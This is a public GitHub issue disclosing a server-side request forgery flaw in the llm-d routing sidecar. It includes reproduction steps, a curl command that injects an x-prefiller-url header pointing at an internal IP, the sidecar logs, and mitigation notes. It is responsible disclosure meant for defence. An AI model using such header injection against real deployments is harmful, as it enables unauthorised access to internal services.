-
Notifications
You must be signed in to change notification settings - Fork 79
Description
Disclaimer
Since the project is new and I've not seen any responsible disclosure process documented (as stated here https://llm-d.ai/docs/community/contribute#security), I'm creating a public issue in the hope that many are still only experimenting with llm-d and it's not affecting their production setup.
Problem
There is a potential for Server-Side Request Forgery (SSRF).
The routing sidecar honors the x-prefiller-url
and x-prefiller-host-port
headers, however, I'd expect the header to not be passed through by the scheduler or Gateway (at least) from external, user-provided requests.
This allows a malicious external user to craft a request that forces the sidecar to forward the prefill stage of the request to an arbitrary URL or host:port. This bypasses the intended routing logic managed by the scheduler.
To Reproduce
- Deploy a model fronted by Gateway and the inference scheduler on a cluster (e.g., KinD).
- Send a POST request to the model's inference endpoint via the gateway.
- In the request, include the header x-prefiller-url pointing to an arbitrary internal service address.
- Observe that the request is successfully processed by the unintended service.
Example curl command
The following command was sent to the gateway at 172.18.0.3. It includes the x-prefiller-url
header, which points to an arbitrary internal IP http://10.244.0.51:8000. The request succeeds with a 200 OK status, indicating the sidecar forwarded the request as instructed by the header.
curl -v -XPOST \
-H "x-prefiller-url: http://10.244.0.51:8000" \
-H "Content-Type: application/json" \
-d '{"model": "facebook/opt-125m", "prompt": "Write a poem about colors...", "stream": false, "max_tokens": 400}' \
http://172.18.0.3/default/facebook-opt-125m-pd/v1/completions
and you will see logs like these for the sidecar:
I0703 09:55:11.606604 1 chat_completions.go:310] "sending request to prefiller" logger="proxy server" url="http://10.244.0.51:8000/" body="{\"do_remote_decode\":true,\"max_tokens\":400,\"model\":\"facebook/opt-125m\",\"prompt\":\"Write a poem about colors, Write a poem about colors, Write a poem about colors, Write a poem about colors, Write a poem about colors, Write a poem about colors, Write a poem about colors, Write a poem about colors, Write a poem about colors, Write a poem about colors, Write a poem about colors, Write a poem about colors, a very long one please\",\"stream\":false}"
I0703 09:55:12.898331 1 chat_completions.go:334] "warning: missing 'remote_block_ids' field in prefiller response" logger="proxy server"
I0703 09:55:12.898347 1 chat_completions.go:340] "warning: missing 'remote_engine_id' field in prefiller response" logger="proxy server"
I0703 09:55:12.898351 1 chat_completions.go:346] "warning: missing 'remote_host' field in prefiller response" logger="proxy server"
I0703 09:55:12.898355 1 chat_completions.go:352] "warning: missing 'remote_port' field in prefiller response" logger="proxy server"
I0703 09:55:12.898361 1 chat_completions.go:355] "received prefiller response" logger="proxy server" remote_block_ids=null remote_engine_id=null remote_host=null remote_port=null
I0703 09:55:12.898389 1 chat_completions.go:393] "sending request to decoder" logger="proxy server" body="{\"do_remote_prefill\":true,\"max_tokens\":400,\"model\":\"facebook/opt-125m\",\"prompt\":\"Write a poem about colors, Write a poem about colors, Write a poem about colors, Write a poem about colors, Write a poem about colors, Write a poem about colors, Write a poem about colors, Write a poem about colors, Write a poem about colors, Write a poem about colors, Write a poem about colors, Write a poem about colors, a very long one please\",\"remote_block_ids\":null,\"remote_engine_id\":null,\"remote_host\":null,\"remote_port\":null,\"stream\":false}"
Notes
- Egress network policy can mitigate the issue for external and cluster internal traffic (however, it's not very simple to configure OOTB as vllm needs to connect to HF, etc to download the model(s))
- Unclear if an HTTPRoute filter that removes the header would mitigate the issue and not break the P/D functionality since filters are applied before the "action" (I'm not sure what that means in the context of InferencePool and ExtProc)